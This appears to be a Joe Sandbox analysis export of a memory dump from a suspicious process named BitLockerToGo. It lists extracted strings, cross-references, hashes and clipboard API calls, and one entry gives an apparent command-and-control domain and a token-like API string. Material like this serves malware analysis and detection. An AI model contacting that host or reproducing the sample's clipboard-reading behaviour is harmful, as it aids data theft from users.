O!U#, xrefs: 026DE934
"A1C, xrefs: 026DE98C
;U0W, xrefs: 026DE9C3
WP, xrefs: 026DF6EB
:9, xrefs: 026DEDC2
@qFs, xrefs: 026DEA10
9]-_, xrefs: 026DE9D9
9M'O, xrefs: 026DF2CE
h1i?, xrefs: 026DEDAC
IyK{, xrefs: 026DEA26
o=K?, xrefs: 026DE981
]i)k, xrefs: 026DE9FA
_-]/, xrefs: 026DE955
<a[c, xrefs: 026DE9E4
4`[b, xrefs: 026DF690
<I/K, xrefs: 026DE9A2
4i<k, xrefs: 026DF132
y5n3, xrefs: 026DEDA1

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "A1C$*m(o$1Y6[$4`[b$4i<k$56$9M'O$9]-_$:9$;U0W$<I/K$<a[c$=E5G$@qFs$EuEw$IyK{$O!U#$Q1U3$WP$WeQg$]5X7$]i)k$_-]/$h1i?$k>h0$o=K?$x:m<$y5n3$uw
API String ID: 0-1354670257
Opcode ID: 19261947ddb680a66141e81422579c535af37d2b7c1b657b8e6b11e198014c07
Instruction ID: ff4c07bfe101f04f4be49c14efef52d902d586790a9396fce96b49daa00f00e7
Opcode Fuzzy Hash: 19261947ddb680a66141e81422579c535af37d2b7c1b657b8e6b11e198014c07
Instruction Fuzzy Hash: C98209B410D385CBE334CF25D580BAABBE1BB85704F248E2DE6E99B255DB708445CF92

Function 026DE850 Relevance: 37.0, Strings: 29, Instructions: 711COMMON

Download Yara Rule

Strings

*m(o, xrefs: 026DEA05
]5X7, xrefs: 026DE96B
1Y6[, xrefs: 026DE9CE
uw, xrefs: 026DF0E8
x:m<, xrefs: 026DF4CE
Q1U3, xrefs: 026DE960
EuEw, xrefs: 026DEA1B
k>h0, xrefs: 026DF4D9
WeQg, xrefs: 026DE9EF
56, xrefs: 026DF4EF
=E5G, xrefs: 026DE997
O!U#, xrefs: 026DE934
"A1C, xrefs: 026DE98C
;U0W, xrefs: 026DE9C3
WP, xrefs: 026DF6EB
:9, xrefs: 026DEDC2
@qFs, xrefs: 026DEA10
9]-_, xrefs: 026DE9D9
9M'O, xrefs: 026DF2CE
h1i?, xrefs: 026DEDAC
IyK{, xrefs: 026DEA26
o=K?, xrefs: 026DE981
]i)k, xrefs: 026DE9FA
_-]/, xrefs: 026DE955
<a[c, xrefs: 026DE9E4
4`[b, xrefs: 026DF690
<I/K, xrefs: 026DE9A2
4i<k, xrefs: 026DF132
y5n3, xrefs: 026DEDA1

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "A1C$*m(o$1Y6[$4`[b$4i<k$56$9M'O$9]-_$:9$;U0W$<I/K$<a[c$=E5G$@qFs$EuEw$IyK{$O!U#$Q1U3$WP$WeQg$]5X7$]i)k$_-]/$h1i?$k>h0$o=K?$x:m<$y5n3$uw
API String ID: 0-1354670257
Opcode ID: 9695d43a566e8f34721cf71d43c4b8dd320847956d56e5695c6f87f1ebcb5eae
Instruction ID: 1246c828465845aa1bf9eb50bcf600bf393f211ee73589aa21fdf77481b78d65
Opcode Fuzzy Hash: 9695d43a566e8f34721cf71d43c4b8dd320847956d56e5695c6f87f1ebcb5eae
Instruction Fuzzy Hash: AC820AB410C385CBE334CF25D590BAABBE1BB85704F648E1DE6EA9B255DB708045CF92

Function 026D5172 Relevance: 14.8, Strings: 11, Instructions: 1041COMMON

Download Yara Rule

Strings

.W$7, xrefs: 026D5672
II, xrefs: 026D52C5
3zx, xrefs: 026D51AD
3-), xrefs: 026D564F
_Z, xrefs: 026D5B40
x|}{, xrefs: 026D59D7
xHx~, xrefs: 026D59DE
]H, xrefs: 026D5B47
7<0?, xrefs: 026D5656
nml, xrefs: 026D51C2
%%,?, xrefs: 026D5664

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %%,?$.W$7$3-)$3zx$7<0?$II$]H$_Z$xHx~$x|}{$nml
API String ID: 0-2043650400
Opcode ID: 8e6b5565791a3a04b53a204da2fedd9d0ce47a4c22e2519e8a84e04c8167c1a3
Instruction ID: 0635f6b984c8a0a4fa6e420300775e65d2a6e0b97b1b696154bb3e75af7d9f97
Opcode Fuzzy Hash: 8e6b5565791a3a04b53a204da2fedd9d0ce47a4c22e2519e8a84e04c8167c1a3
Instruction Fuzzy Hash: 9C82DFB1D00258CBDB24CF58C4906AEBBF2FF4A314F68859CD8966B781D335A945CFA4

Function 026C2FE0 Relevance: 10.6, Strings: 8, Instructions: 597COMMON

Download Yara Rule

Strings

[, xrefs: 026C3388
true, xrefs: 026C30F2
false, xrefs: 026C310A
., xrefs: 026C3086
null, xrefs: 026C31AD
., xrefs: 026C30AB
{, xrefs: 026C3262
0, xrefs: 026C3080

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: .$.$0$[$false$null$true${
API String ID: 0-1639024219
Opcode ID: 1ccf7cc60f6321e827e9e27b06acd89c6c040126c0c7fccb2091ecd94aaacce4
Instruction ID: 6956a89de80735bf88b1cdd5729f4ef4e98197cab67c2ca84b3c5ac51ffd9f82
Opcode Fuzzy Hash: 1ccf7cc60f6321e827e9e27b06acd89c6c040126c0c7fccb2091ecd94aaacce4
Instruction Fuzzy Hash: 4212C2B1A043499BE7107F65D8857767AE4EF4034CF34C4ACEC8A8A342EB35D568CB56

Function 026F1530 Relevance: 9.2, APIs: 6, Instructions: 217clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 026F1559
GetWindowLongW.USER32 ref: 026F1586
GetClipboardData.USER32 ref: 026F1596
CloseClipboard.USER32 ref: 026F186D

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID:
API String ID: 1647500905-0
Opcode ID: ee6dca5b5f3c60a168d3de91211d909233df2e2567663a6130176956eee99678
Instruction ID: ead2eece02ace17c0bad11e046f6616346f2a5b1905c5666299786141b82ceee
Opcode Fuzzy Hash: ee6dca5b5f3c60a168d3de91211d909233df2e2567663a6130176956eee99678
Instruction Fuzzy Hash: DA81ADF1C193408BD700BFB4DA0935EBEB1EF92346F05886CC5D997241E6758519CBA3

Function 026E866E Relevance: 8.5, APIs: 1, Strings: 3, Instructions: 1501COMMON

Download Yara Rule

Strings

$F0l, xrefs: 026E8A0C
0 :b, xrefs: 026E95A5
TW{O, xrefs: 026E959B

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $F0l$0 :b$TW{O
API String ID: 0-3176624850
Opcode ID: 5446f1a799d779afc9d2cb920b8a2f4bb41e332ba767e3eca99fcb35e66a1ec1
Instruction ID: ef4fc1ffc3765239910b60d4769b7086e9e3973d44b94b5f9cbcfb87d0e1ef07
Opcode Fuzzy Hash: 5446f1a799d779afc9d2cb920b8a2f4bb41e332ba767e3eca99fcb35e66a1ec1
Instruction Fuzzy Hash: FAC28A70506B828BD725CF29C1907A7BBE2AF52304F58885EC4EB9B792C735B449CF94

Function 026EA2E3 Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 779COMMON

Download Yara Rule

Strings

$F0l, xrefs: 026E8A0C
xuy{, xrefs: 026E881C
X\\h, xrefs: 026EA3F8

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $F0l$X\\h$xuy{
API String ID: 0-708942647
Opcode ID: 80a150adf24674099976b7ed59f05732c3466a14a54807797dff4613e5dbe23b
Instruction ID: 56e5549a27de150dbef077ecdc1de09d1f91b0cdc51b4989eaa0c446cd8cc2c4
Opcode Fuzzy Hash: 80a150adf24674099976b7ed59f05732c3466a14a54807797dff4613e5dbe23b
Instruction Fuzzy Hash: C7526670409B828AD725CB29C4907E7BBE1AF52309F44485ED8EF9B392C7397549CFA4

Function 026E7B30 Relevance: 5.9, Strings: 4, Instructions: 943COMMON

Download Yara Rule

Strings

r/!(, xrefs: 026E7D09
80I9, xrefs: 026E7D1D
X\\h, xrefs: 026EA3F8
+V5H, xrefs: 026E7D13

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: +V5H$80I9$X\\h$r/!(
API String ID: 0-3448863506
Opcode ID: a2f7cb54fab69d8909a202d2701db7c6ce27f46a62202da1678d64ecba9cc302
Instruction ID: bbc1e8d960091a7e4835f78f86101ec2b9ebd57ef84a5b4c2397eeac028504f2
Opcode Fuzzy Hash: a2f7cb54fab69d8909a202d2701db7c6ce27f46a62202da1678d64ecba9cc302
Instruction Fuzzy Hash: 9B62BE70509B818FD725CF29C5907A3FBE2AF52309F188A5DC4EB4B792D738A845CB91

Function 026CF578 Relevance: 5.7, Strings: 4, Instructions: 685COMMON

Download Yara Rule

Strings

Kj, xrefs: 026D00E6
FM?>, xrefs: 026D0128
2, xrefs: 026CFDD3
0, xrefs: 026CFCA6

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$2$FM?>$Kj
API String ID: 0-1586943010
Opcode ID: c2b58d799c624246f197c7bce8e8cb5d2de287906bb55f358991b42c2e8d008e
Instruction ID: 2082975a44f8b6f05496fabe8641c217e9a21b70d4eebf6cc16917e33e7a7614
Opcode Fuzzy Hash: c2b58d799c624246f197c7bce8e8cb5d2de287906bb55f358991b42c2e8d008e
Instruction Fuzzy Hash: DD32BDB19083818FD325DF28D890B6BBBE2EF86304F28496DE5C997391D735D845CB92

Function 026D22E6 Relevance: 5.7, Strings: 4, Instructions: 659COMMON

Download Yara Rule

Strings

F, xrefs: 026D2524
01, xrefs: 026D2986
vh, xrefs: 026D28CE
4`[b, xrefs: 026D2E70

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 01$4`[b$F$vh
API String ID: 0-3121856630
Opcode ID: cdf116fe2b525cb0aab5c7832e7489a562facc70884f5931f84eb3b41fc7aa73
Instruction ID: b9dccd21f7cebae63972d5eca69ae27db8cec6b576a652e5d763e27c01bdf36e
Opcode Fuzzy Hash: cdf116fe2b525cb0aab5c7832e7489a562facc70884f5931f84eb3b41fc7aa73
Instruction Fuzzy Hash: 3222AB71A083459FD324DF28C8A0B6BB7E1EF89354F54892DE8CA87392D734D845CB96

Function 026CD4D0 Relevance: 5.4, Strings: 4, Instructions: 446COMMON

Download Yara Rule

Strings

sf~g, xrefs: 026CD4D0
35, xrefs: 026CD56E
?1, xrefs: 026CD564
sergei-esenin.com, xrefs: 026CD811

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: sergei-esenin.com$sf~g$35$?1
API String ID: 0-3600862256
Opcode ID: 2458dabbca14d568b36c5b20cb3de7e87851de20dc1b596d56a584345928f53d
Instruction ID: 19bc6a130994ce0cdd7ab2c2ba9e5d09c9def1555bb68ce016895255ef8acf50
Opcode Fuzzy Hash: 2458dabbca14d568b36c5b20cb3de7e87851de20dc1b596d56a584345928f53d
Instruction Fuzzy Hash: F80264B4A05229CBDB24DF94CCA4BEEBB71FF45300F1485ACE8196B284CB305A86CF55

Function 026CC000 Relevance: 5.4, Strings: 4, Instructions: 422COMMON

Download Yara Rule

Strings

A, xrefs: 026CC465
~, xrefs: 026CC01E
KA76bXL2WTSswwWgUthrXfl2SF0slAZ3ZU5ZpVRMO4M-1728848097-0.0.1.1-/api, xrefs: 026CC507, 026CC524
(+, xrefs: 026CC1D7

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: (+$A$KA76bXL2WTSswwWgUthrXfl2SF0slAZ3ZU5ZpVRMO4M-1728848097-0.0.1.1-/api$~
API String ID: 0-825410466
Opcode ID: 1a872453c76c3fbaa32c09e715a5a519e56e4d6bce07972da435d04e6016c92c
Instruction ID: 30ef9b86d433768d719761524bfbcd02e136367fd9af4f1058d15971656f1706
Opcode Fuzzy Hash: 1a872453c76c3fbaa32c09e715a5a519e56e4d6bce07972da435d04e6016c92c
Instruction Fuzzy Hash: 14E155B020C3808FD315EF18C090A2EBBE1EF95658F688A1EE4D99B351C375D856CB97

Function 026E0970 Relevance: 5.3, Strings: 4, Instructions: 341COMMON

Download Yara Rule

Strings

4`[b, xrefs: 026E0920
4`[b, xrefs: 026E0860
4`[b, xrefs: 026E0A20
}{, xrefs: 026E06C5

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$4`[b$}{
API String ID: 0-475273664
Opcode ID: 87da3b103a82e4309461f2c56d80a83b9b0b41c0e3d53f65833f43d41b9d309f
Instruction ID: 8be2d29fa25275b31e3650e2c06d8b6bc4f4bb29607fb576b5d9e5b15e60ed85
Opcode Fuzzy Hash: 87da3b103a82e4309461f2c56d80a83b9b0b41c0e3d53f65833f43d41b9d309f
Instruction Fuzzy Hash: 27B197B1909344DBCB00DF58D490A2BB7E1FB88704F548D1CE5CAA7252DB71E815CF96

Function 026E0360 Relevance: 5.2, Strings: 4, Instructions: 210COMMON

Download Yara Rule

Strings

0#, xrefs: 026E0427
,8, xrefs: 026E0417
G#, xrefs: 026E041F
4`[b, xrefs: 026E0A20

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,8$0#$4`[b$G#
API String ID: 0-1231841115
Opcode ID: b1ada7f8d38a35a6e7dee8bd85bdc34abbbd3fc0bba36b24e0f3399554462801
Instruction ID: 4de5febd243fd782c46a9842af9f9d36fc5230a71f25677622c1f14baf8abb76
Opcode Fuzzy Hash: b1ada7f8d38a35a6e7dee8bd85bdc34abbbd3fc0bba36b24e0f3399554462801
Instruction Fuzzy Hash: E58175B050D380DFE3289F55E494B5BBBA1FB81704F50891DE2C65B295DB70A818CF46

Function 026F3D5E Relevance: 4.7, Strings: 3, Instructions: 905COMMON

Download Yara Rule

Strings

<, xrefs: 026F4708
>, xrefs: 026F4711
0, xrefs: 026F4B26

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$<$>
API String ID: 0-1437308683
Opcode ID: 16cd40c886e28d84031eccceade3146ac54fd0326240fecca972686e082dc9d2
Instruction ID: a8f38f5b16f8628294a13aa1ee98e4c40519d149bc88ee7c1a0d64f4ffb88df5
Opcode Fuzzy Hash: 16cd40c886e28d84031eccceade3146ac54fd0326240fecca972686e082dc9d2
Instruction Fuzzy Hash: 6782E4B2C196848AC710ABB4DE0635EBEF1EF52705F0545ECC6989B385E670864CCFA7

Function 026DF8B7 Relevance: 4.3, Strings: 3, Instructions: 519COMMON

Download Yara Rule

Strings

WP, xrefs: 026DF6EB
ol, xrefs: 026DFA13
4`[b, xrefs: 026DF690

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$WP$ol
API String ID: 0-2394068658
Opcode ID: f8c1c83e9c955a28f77484a66784029c725ceec5ab1e755ca4f195d03efca588
Instruction ID: 46549c6c72e6b6b2ce2061da83d9193ff912e4db2f25e52e51ad126d2a5196fe
Opcode Fuzzy Hash: f8c1c83e9c955a28f77484a66784029c725ceec5ab1e755ca4f195d03efca588
Instruction Fuzzy Hash: DC027874A08345CBC728CF28C59066BB7F1FF89744F588A1CE5CA8B660EB34D955CB92

Function 026E8535 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 725COMMON

Download Yara Rule

Strings

0<1, xrefs: 026E9B37

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0<1
API String ID: 0-2445462277
Opcode ID: b25ed8e4f858d83490b7be4b3598b0652f6eccae82ae262a658d1009cf25fee0
Instruction ID: 3f2dd8fff3071726059c627f2b6d645b6f9267d73d088868364b9ee161522133
Opcode Fuzzy Hash: b25ed8e4f858d83490b7be4b3598b0652f6eccae82ae262a658d1009cf25fee0
Instruction Fuzzy Hash: 6742F370106B818BD738CF39C4907A7BBE2AF52314F148A5ED4EB4B792C735A549CB91

Function 026E0D30 Relevance: 4.2, Strings: 3, Instructions: 404COMMON

Download Yara Rule

Strings

{?vk, xrefs: 026E10F8
t, xrefs: 026E1100
~y, xrefs: 026E10F0

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: ~y$t${?vk
API String ID: 2994545307-3090336065
Opcode ID: ebbe12cf746da86125608948eb5bf9c817de2261044e86807a11a13463e7c039
Instruction ID: 9df7e72461af7da3f8c96f3d0b7347c96ca0502c5e1e3de2973c84c2d75334e1
Opcode Fuzzy Hash: ebbe12cf746da86125608948eb5bf9c817de2261044e86807a11a13463e7c039
Instruction Fuzzy Hash: B2B1E17160A3418BDB18DF28C89072BB7E2EF91308F14492CE5CA9B391D775E915CB96

Function 026EF4C7 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 632memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 026EF681

Strings

0, xrefs: 026F0008

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: db5151cf8c275eb0965dd98a3d5582b8e0ae9a786a34ac301be9878b8794f005
Instruction ID: 4051de6c5a432e23b131be46629615c1e0ddc2dd316d0c0739524671afc4b626
Opcode Fuzzy Hash: db5151cf8c275eb0965dd98a3d5582b8e0ae9a786a34ac301be9878b8794f005
Instruction Fuzzy Hash: B84243F182D7808AC310BF78A90635BBEE1EF62306F45896DC4D99B341E670915CDBA7

Function 026EAE2B Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 517memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 026EAF94

Strings

0, xrefs: 026EB99D

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 46c1aa7e3d4783c8cafb10b447e6cf667811d2f710046e441ac2e275ad7d108f
Instruction ID: d4947443bbba60144e03cef77f8ad0181c7984385c811859f1cad947c191c485
